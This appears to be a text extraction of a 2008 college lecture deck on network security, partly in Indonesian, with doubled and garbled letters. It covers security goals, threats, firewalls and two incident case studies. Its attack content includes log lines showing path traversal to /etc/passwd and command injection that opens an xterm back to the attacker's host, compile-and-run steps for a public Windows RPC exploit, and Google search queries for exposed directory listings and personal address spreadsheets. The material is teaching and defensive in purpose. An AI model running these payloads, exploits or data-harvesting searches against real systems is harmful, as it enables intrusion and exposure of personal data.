Computer Network and Security

Computer Networking andand

Security

RUDI LUMANTO

STMIK NUSA MANDIRI

RUDI LUMANTO STMIK NUSA MANDIRINovember 2008

Referensi dan Kontak InfoGlenn Berg“Networking Essentials”, New Riders Deborah Russel, G.T Gangemi Sr, “COMPUTER SECURITY BASIC”, O’Reilly & AssociatesyJohn E Caravan, “FUNDAMENTALS OF NETWORK SECURITY”, Artech Houseinternetinternet

KONTAK : RUDI [email protected]

0815-1036-9754

RUDI LUMANTO STMIK NUSA MANDIRI, November 2008

0815 1036 9754STMIK NUSA MANDIRI

KRITERIA PENILAIANKRITERIA PENILAIAN

TUGAS (2-4 report) : 20%UJIAN TENGAH SEMESTER : 30%%ABSENSI KEHADIRAN : 10 %UJIAN AKHIR SEMESTER : 40%UJIAN AKHIR SEMESTER : 40%


DAFTAR SILABUSDAFTAR SILABUS

OverviewNetwork standards (OSI)Network components Network protocol (TCP/IP)p ( )Network OS and ServicesNetwork/Internet SecurityNetwork/Internet Security


DAFTAR SILABUSDAFTAR SILABUSSoftware threats : virus worm etcSoftware threats : virus, worm etcInternet threats: TCP attack, DNS, DOS etc

i ll d i i SFirewall and Intrusion Detection System (IDS)Cryptography and its applicationsVPN


COMPUTER NETWORKING and

SECURITYSECURITY

OVERVIEW

Standar Keamanan Jaringan

Komponen Jaringan Ancaman Internet : TCP Attack, DOS, DNS dll

Ancaman Sofware : Virus, Worm dll

Protokol (TCP/IP)

Firewall dan IDS

Cryptography dan

OS dan LayananJaringan

Cryptography danAplikasi

VPN


COMPUTER NETWORKING and SECURITY

1 OVERVIEW1. OVERVIEW


outlineoutline

Simple cases and toolsWhy Computer Networking and Why y p g ySecurity ?Computer Security GoalsComputer Security Goals.Threats, Vulnerabilities, Attacks

li dPolicy and measureMaking a good security policy


Simple case and tool( seing the( seing the technique/informasitionbehind a case)


A Security Case

A company called “Acme-art. Inc” doing an online business in the internet. They have a database that record all customers information included their credit cardi f i d d h i i h d b fi llinformation and connected to their site www.acme-art.com that protected by firewall.31 October 2001 a hacker intrude to their system and stole all credit card information, Then put the information into newsgroup usenet. A few hour then the company has loss million dollars bad reputation and have to invest many more money to keep theirloss million dollars , bad reputation and have to invest many more money to keep their business alive.

What happen ? How it could be happen ?

The firewall is installed. And the internet access can Fact :


only be done through http port 80.

Security team investigation: Sample case 1

Looking for clues in log file…

10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 300810.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 345210.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 846810.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 691210.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891

10 0 1 21 - - [31/Oct/2001:03:03:13 +0530] "GET /index cgi?page=falls shtml HTTP/1 0" 200 680

A

10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] GET /index.cgi?page=falls.shtml HTTP/1.0 200 68010.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 5264010.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 65210.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580

B

C10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272

10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 300810.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358

C

D

10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358

10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1 0" 200 1228

E


HTTP/1.0" 200 122810.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228

F


Part A in log file

10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 300810.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 345210.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 846810.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 691210.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891

Browsing …….g



Part B in log file

10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 68010.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 5264010.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 65210 0 1 21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel jpg HTTP/1 0" 200 36580

g

10.0.1.21 [31/Oct/2001:03:03:18 +0530] GET /tahoel.jpg HTTP/1.0 200 36580

Browsing …….



l f lPart C in log file

10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272[ / / ] / g / /

T i di tTrying direct access ….

Error response



Part D in log fileg10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 300810.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358

Attacking …

SecurityHole

1


Security team investigation: Sample case 1Perl script


Security hole 1: validation form for parameter variable will be transfer to index.cgi script


Part E in log filePart E in log file10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358

Attacking …

SecurityHole

1


Recovering passwd file


Passwd filePasswd file

root:x:0:0:root:/root:/bin/bash………………Lion:x:500:500::/home/lion:/bin/bash


Security hole 1 effect: recovering important “passwd” files


Part F in log file10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 122810.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228

Attacking …

SecurityHole

2


Direct execution to server commands


10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0[ / / ] / g p g | p y+%26| HTTP/1.0" 200 1228


Information/technique behind the case

Understanding about computer and networkInformation about targetgHTTP Structure CGI/PERLCGI/PERL LINUX system and its command


Httpd file default structures what is the web site structure ?

Lisv01

/(root)

h bi bi dhome var sbin bin dev etc usr …

u01 u02 u03 … www httpd init.dlog

public_html html conf (default user’s directory) (default document root) httpd

httpd

httpd.conf


*Document root : The directory that holds HTML documents.* : file

11

WWW server

Client-side application

Behind the Web

WWW server

WWW browser

Internet/Intranet

WWW server software

HTML&Intranet server_software Script

Execute application

N t k l di li ti

JAVA SCRIPT

WWW server software A li ti

WWW serverNetwork-loading application

WWW browser

Internet/I t t

ＷＷＷﾌﾞﾗｳｻﾞ

server_softwareApplication

Application

S id li ti

Intranet

Execute applicationJAVA Applet,Active X

WWW server

WWW Server

Server-side application

WWW browser

Internet/

Active X

CG


ApplicationServer_software

Internet/Intranet

Execute application

CGI,Active Server Pages

S 2Sampe case 2


Sample case 2

After a period of new reqruitment,a server in a company suddenly crash down. Company network become unavailable for a while and it led to the much loss in production.a while and it led to the much loss in production.

What happen ?What happen ? How it could be happen ?

No Log files indication !!!


Security team investigation: Looking for clues by social engineering

O l i ll h i d 2000 i hi d

Sample case 2

One new employee install the windows 2000 server in his computer and connect tothe LAN with global IP address.

Other Clues : 1. Nessus report on vulnerabilies in windows 20002. exploit program available

Analysis of Host

Nessus report on

Address of Host Port/Service Issue regarding port

192.168.27.31 ftp (21/tcp) Security hole found

192.168.27.31 smtp(25/tcp) Security hole foundpWindows 2000 serverafter IIS installation

192.168.27.31 http (21/tcp) Security hole found

192.168.27.31 nntp (119/tcp) Security hole found

192.168.27.31 msrpc(135/tcp) Security hole found

192.168.27.31 Netbios-ssn (139/tcp) Security not found

192.168.27.31 https (443/tcp) Security not found

192.168.27.31 Microsoft-ds (445/tcp) Security hole found


…… …. ….

…… …. ….

NESSUS report in detail

Sample case 2

Other references: IAVA:2003-A-0012

NESSUS report in detail

NESSUS ID:11835

Vulnerability msprc(135/tcp) The remote host is running a version of windows which has a flaw in its RPC interface which may allow an attacker to execute arbitrary code y yand gain SYSTEM privileges. There is at least one WORM which is currently exploiting this vulnerability. Namely, the MsBlaster worm.

Solution : see http://www.microsoft.com/technet/security/bulletin/MS03-026.mspxRisk factor: highCVE:CAN-2003-0352BID:8205Other referemces: IAVA:2003-A-0011NESSUS ID: 11806

Warning msprc(135/tcp) Distributed Computing Environment (DCE) services running on the remote host


remote host

NESSUS ID : Identity Number of Vulnerability Check by NESSUSBID : Buqtraq ID : related documentation regarding the vulnerability including

Sample case 2

BID : Buqtraq ID : related documentation regarding the vulnerability including exploit code , see: security focus site

simulation

1. Downloading the exploit code source file (from security focus site or Whoppix CD）$cp /KNOPPIX/pentest/exploits/securityfocus/8205/oc192-dom.c

simulation

p p p y2. Compiling source file

$gcc oc192-dom.c3. executing the exploit into the IP target machine

$a out d 192 168 94 204$a.out -d 192.168.94.204

Get the system access

C:>WINNT\SYSTEM32\


Information/technique behind the case

-Understanding about network-Insufficient security orientation for new employeeL k f k l d b t OS-Lack of knowledge about OS

-There is always exploit code in the internet-Lack of information about update


Why Computer Network ?Why Computer Network ?

1. File sharing memungkinkan akses terhadap sebuah file kapan saja dandimana sajaj

2. Effective data transfer Pengiriman data dengan cepat dan efisien3. Hardware sharing Dapat menggunakan bersama satu printer, hardisk dsb4. Realtime communication Dapat melakukan hubungan komunikasi via teks,

audio gambar ataupun video secara realtime


audio, gambar ataupun video secara realtime5. Operational cost reduction mengurangi biaya komunikasi telpon, pemakaian

kertas, pengiriman surat dsb.

File/Information resources sharingg

Information resources : printer, data, files

Users can share a printer connected to LAN.There is no need to connect to a printer to each printereach printer

Users can share data on the computers,User in computer C can handle files on Computer B as if they were his own files


Effective data transfer

- The data transmission speed is scores to several hundred Mbps. For example, A4 sized document (30Kbytes) can be transmitted over a LAN in 0.024 second.

bps (bits per second) = a unit rate at which data can be transmitted over a communication line expressed


as the number of bits transmitted per second. 9600 bps means 9600 bits are transmitted in one second.

Hardware sharing

- Effective use of hardware (Printer, Hard disk etc)


( )- Easy to add new computers or relocate existing computers- Easy to connect to computers of different vendors

Contoh Kegunaan JaringanSeat Reservation Network

- Inquiries are issued from various places- Connected to seat reservation databaseon the central computer- Answer to inquiries are generated Immediately- Also in updating databases and issuesAlso in updating databases and issuesa ticket

Example of similar system: money withdrawal, balance inquiry etc


Type of Networkyp

Mainly divided into 2 types based on their scale (area that a network

covers).covers).

LAN is implemented within a building or Factory.

WAN is implemented by connecting two or more LAN between office and laboratories, or two countries


Why Computer SecurityWhy Computer Security

T t t /i di id l tTo protect company/individual assets– Hardware, software and INFORMATION (data, ability

and Reputation)and Reputation)

To gain a competitive advantage– How many people will use a bank’s internet banking y p p g

system if they knew that the system had been hacked in the past ?

l i h l iTo comply with regulatory requirements To keep your job


Computer Security GoalsComputer Security GoalsC onfidentialityC onfidentialityI ntegrity

A il bilitA vailability

Confidentiality : Prevention of unauthorized access to data, and accidental dataConfidentiality : Prevention of unauthorized access to data, and accidental data disclosures

Integrity : Prevention of improper modifications of the data, either intentionally or accidentally. 1) Modification of the data by unauthorized parties. 2) O ti d t b th i d l i th t i i tibl2) Operation on data by authorized personnel in ways that is incompatible with the nature (syntax) of the data, leading to its corruption.3) Any modification to append-only records, to alter their evidence value.

Availability : Measures to protect data should not result in making it difficult


y p gto access and modify the data in ways in which it was intended.

Threats,vulnerabilities and Attacks

Anything that can disrupt the operationTHREATS

Anything that can disrupt the operation, functioning, integrity or availability of computer systemcomputer system.

Stand alone threats– Threat arise without any connection to other system, Ex:

virus password crackervirus, password cracker

Connection threats– Threat arise because of connection to other system


◆Threats Arising from Connection to the other computers

Information leaks •• A database of customer information, including credit card numbers is leaked from an Internet service provider

Falsification

numbers, is leaked from an Internet service provider.

•• The contents of the web site of a public institution are rewritten with the political messages of a dissident group.

Denial of services

rewritten with the political messages of a dissident group.

•• A bookshop site is attacked and its server goes down, discontinuing service.

Impersonation

d sco t u g se ce

•• An intruder fakes a membership site for the purchase of merchandise.

Attack platform •• A corporate network administering a server used as a platform for attacking other sites was sued for compensation for the


damage caused.

Vulnerabilities Weakness in the design, configuration or

implementation of a computer system thatimplementation of a computer system that renders it susceptible to a threat.

1. POOR DESIGN Hardware and software system that contain design flaws that can beexploited Ex: sendmail flaws in early version of unix that allowedexploited. Ex: sendmail flaws in early version of unix that allowed hackers to gain privileged root access

2. POOR IMPLEMENTATIONSystem that incorrectly configured because of in-experience insufficientSystem that incorrectly configured because of in-experience, insufficienttraining or sloppy work. Ex: a system that does not ave restricted access Privileged on critical executable file.

3. POOR MANAGEMENT


Inadequate procedures and insufficient checks and balances. Ex: No documentation and monitoring

Critical Vulnerabilities and Vulnerability Scanning

Certain security vulnerabilities are declared critical when they are (or are about to) being actively exploited and represent a clear and present dangerUpon notification of a critical vulnerability, systems must be patched by a given date or y p y gthey will be blocked from network access


◆Types of Vulnerability

OS/Program name Cause InfluenceIndex Server ( WindowsNT)Index Service (Windows2000)

ISAPI extension idq.dll overflow

Local system permission seized by an outsider

telnetd (FreeeBSD 4.3 and Buffer overflow during AYT Telnetd permission (normally (earlier, Red Hat 7.1 and earlier, etc.)

goptional packet processing

p ( yroot) seized by an outsider

sadmind (Solaris2.3 – 7) Buffer overflow during NETMGT_PROC_SERVICE

Command executable with root permission by an outsider

request processingSSH 1.2.31 OpenSSH 2.2 and earlier

Overflow in an int variable in detect_attack function

Command executable with root permission by an outsider

dtspcd (AIX 4.3/5.1, HP-UX Buffer overflow in a shared Arbitrary command p (11.11, Solaris 8, etc.) library

yexecutable with root permission by an outsider

Bind8.2x(Red Hat, Turbolinux, Solaris, AIX , etc.)

Buffer overflow during TSIG processing

Operation permission (normally root) seized by an outsider

wu-ftpd 2.6.0 and earlier (Red Hat linux 6.2 and earlier, etc.)

Format string bug in site-exec and setproctitle functions

Execution permission (normally root) seized by an outsider


IIS4.0 (WIndowsNT)IIS5.0 (Windows2000)

Access to a file outside root directory permitted when path name is UNICODE

Shell command executed with IUSR_Machinename permission by an outsider

ATTACKSA specific technique used to exploit a vulnerabilty.Ex: a threat could be a denial of service, a vulnerability, y

is in the design of OS, and an attack could be a “ping of death”

Passive attacksPassive attacks– Gathering information by monitoring and recording

traffic on the network, or by social engineering. Ex: packet sniffing traffic analysispacket sniffing, traffic analysis

Active attacks– Overt actions on the computer system


Overt actions on the computer system.

◆Denial of ServiceService downedTarget host Service downed due to overloadTarget host

• Large volume data

Attack platform

• Large volume data

• Packets causinga system down

Start attack!!


Policy and MeasurePolicy and MeasureSecurity Trinity : foundation for all security policies and measures that an organization develops and deployg p p y

What is Security ?Definitions from the Amer.Herit.Dic : - Freedom from risk or danger:safety

Measures adopted To preventSecurity

Prevention

- Measures adopted …. To prevent a crime.

Computer Security Measures-Mechanisms to prevent, detect and recover from threats and attacks orfor auditing purposes.


Key pointComputer Security is not only a technical

problem it is a business and peopleproblem, it is a business and people problem.

Th t h l i th t th diffi ltThe technology is the easy part, the difficult part is developing a security policies/plan th t fit th i ti ’ b ithat fits the organization’s business operation and getting people to comply with th lthe plan.

Social engineering : non-technical methods hackers employ to gain access to


g g p y gsystem, refers to the process of convincing a person to reveal information

Security operations

-Prevention againts accidental capture or modification ofg pinformation

-Detection of all improper access to data and system resources

R-Recovery from unauthorized access, restoring data values, system integrity etc

Policies and ProceduresU i il d-User privileged-Data backup

-Security tools to deploy-Monitoring the integrity


Monitoring the integrity-Response to Incident

-User role, etc

◆Types of Users

Hacker A user who tries to obtain access using advanced knowledge g gand techniques.

Cracker A user who attempts sabotage and other subversive activities with malicious motives

Script kiddy A user who has little technical capability and uses tools available on the Internet when attempting cyber attacks

Corporate network

Intrusion, subversion, sabotage

Subversion, sabotageVulnerability


◆Integrity Check Tool

/etc/passwd file

dc577ef5f97b671781c04425737bc4df

#hash value (MD5)

File editing/falsification Mismatch ... Altered!!

b0ed782bbd4c8445f07538a3ede788eb


◆Security Tools and Security Products

Server/clientC t t kMalicious user

Malicious user

Server/clientCorporate network

Internet

• Router(Filtering)• Firewall(VPN)

• H-IDS• Log monitoring

Countermeasures against hacking

Network security Server security

Firewall(VPN)• N-IDS• Vulnerability audit

• Log monitoring• Falsification prevention• Vulnerability audit

against hacking


• Virus scan• Encryption

• Virus scan• Encryption(SSH)

Miscellaneous

◆Firewall?

I t tInternet Intranet

Public WWW server

① HTTP

Client Public FTP server

② HTTP

③ FTP

④ HTTP

⑤Unspecific AP

ClientServer

Authentication

P k t filt i

GW type firewall

• Packet filtering

• Application gateway


• Stateful inspection

◆Encryption VPN(Virtual Private Network)=Leased Linethe Internet e.g. IPsec IPv6

FW/VPN

Remote access user

FW/VPN router

Provider A Provider C

Encrypted Encrypted communicationcommunication

Internet IX

Provider A Provider C

Provider BProvider D

FW/VPN router


Making a good securityg g ypolicy


Making a good security policyMaking a good security policy

Penetration Test/Ethical Hacking– Understanding what is inside the hackers g

mindSecurity Trinityy ySecurity Goals


Definition of "Ethical Hacking“

A thi l h ki i h t d t k t hAn ethical hacking is where a computer and network expert who attacks a security system on behalf of its owners, seeking vulnerabilities that a malicious hacker could exploit. To test a security system ethical hacking uses the same methods as their lesssystem, ethical hacking uses the same methods as their less principled counterparts, but report problems instead of taking advantage of them. Ethical hacking is also known as penetration testing intrusion testing and red teaming Individuals involved intesting, intrusion testing, and red teaming. Individuals involved in ethical hacking is sometimes called a white hat, a term that comes from old Western movies, where the "good guy" wore a white hat and the "bad guy" wore a black hat. g yOne of the first examples of ethical hacking at work was in the 1970s, when the United States government used groups of experts called red teams to hack its own computer systems. According to Ed Skoudis, Vice President of Security Strategy for Predictive Systems' Global Integrity consulting practice, ethical hacking has continued to grow in an otherwise lackluster IT industry, and is becoming i i l t id th t d t h l


increasingly common outside the government and technology sectors where it began. Many large companies, such as IBM, maintain employee teams of ethical hackers.

Inside the Hackers MindS f ll k d S

Focus on the target- Successfully attack and Save -

Never use your own informationNever leave your footstepy pCan ever back again

HACKERS PROCEDURE


Hackers Procedure/stepHackers Procedure/stepTargetingScanningRemote Attack 1. Information gathering

Local AttackLog removing / deception

2. Attack, intrusion

3. Unauthorized actLog removing / deceptionSpace usingTime stamp

4. Actions taken after unauthorized act

Time stamp Back door


Example of Targeting

All Informations about the target

Technique name : Web browser targetingGoals : personal information about the targetOperation base any web browser with search engine siteOperation base - any web browser with search engine site

(google)- online database (WHOIS, IP-CONVERSION,etc)

Location, related company/organization, news, telephone number,Contact (mail address), web author idea/though,/behaviour, site software


Targeting with google

By using the basic search techniques combined y g qwith Google's advanced operators, anyone can perform information-gathering and p g gvulnerability-searching using Google. This technique is commonly referred to as Google q y ghacking.


Google hacking

Mastering google using its standard optionsg g g g p– Double quotation ….to be recognized a keyword as a phrase

– Hyphen (-) …. If you want to exclude words contain keyword

i– site: …. searching only inside the site– * …. wildcard. Use with double quotation to find any

indicate word

– Intitle: …. search limited only to web title– Inurl: …. search limited only to web page URL

I t t h li it d l t i f th– Intext: …. search limited only to main page of the web

– Filetype: …. search focusing on extention type of


file– Phonebook: …. search telephone number

Google hackingMastering google using its optionsMastering google using its options– site: …. searching only inside the site

“hacker” site:www.cnn.com or site:www.cnn.com hacker

This query searches for the word hacker, restricting the search to therestricting the search to the http://www.cnn.comweb site. How many pages on the CNN web server contain the word hacker


Google hackingMastering google using its options– * …. wildcard. Use with double quotation to find any indicate word

“He is a * Hacker”


Google hackingMastering google using its standard optionsaste g goog e us g ts sta da d opt o s– intitle: …. search limited only to web title

intitle: “Hacker”


Google hackingMastering google using its standard optionsMastering google using its standard options– Inurl: …. search limited only to web page URL

inurl: www.securityfocus.com


Google hackingMastering google using its standard optionsg g g g p– intext: …. search limited only to main page of the web

intext: “earthquake”


Google hackingMastering google using its standard optionsg g g g p– Filetype: …. search focusing on extention type of file

“hacking” filetype:ppt" h i " fil i"whoppix" filetype:iso


Google hackingMastering google using its standard optionsg g g g p– Phonebook: …. search telephone number

phonebook: John Doe CA


Searching the site inside (that actually) not explore to publicSearching the site inside (that actually) not explore to public

More on Google hacking

Searching the site inside (that actually) not explore to publicSearching the site inside (that actually) not explore to public

Finding on server directory listingDirectory listings provide a list of files and directories in a browser window instead of the typical text-and graphics mix generally associated with web pages. These pages offer a great environment for deep information gathering

Most directory listings begin with the phrase Index of which also shows in the title AnIndex of, which also shows in the title. An obvious query to find this type of page might be

intitle:index.ofwhich may find pages with the term index of in the title of the document. Unfortunately, this query will return a large number of false positives, such as pages with the following titles:


Index of Native American Resources on the InternetLibDex—Worldwide index of library cataloguesIowa State Entomology Index of Internet Resources


C bi i l i i

Several alternate queries that provide more accurate results:

Combination google options on queries

q pintitle:index.of "parent directory" intitle:index.of name size These queries indeed provide directory listings by not only focusing on index of in the title but on keywords often foundfocusing on index.of in the title, but on keywords often found inside directory listings, such as parent directory, name, and size. Obviously, this search can be combined with other searches

fi d fil f di i l d i di li ito find files of directories located in directory listings.

Example:pName Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“

Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“ intitle:bbs


bbs.dat inurl:"Index of" intitle:“Index of“

Example:Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data"



Example:Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“ intitle:bbs



Example:bbs.dat inurl:"Index of" intitle:“Index of“



Example: searching database of address people written in csv focusing to japan sitefiletype:csv address site:jp


yp jp


Example: searching database of address people written in EXCEL focusing to UK sitefiletype:xls address site:uk


yp


THANK YOU


Th D f th N tThe Dawn of the Net


Computer Network and Security

Documents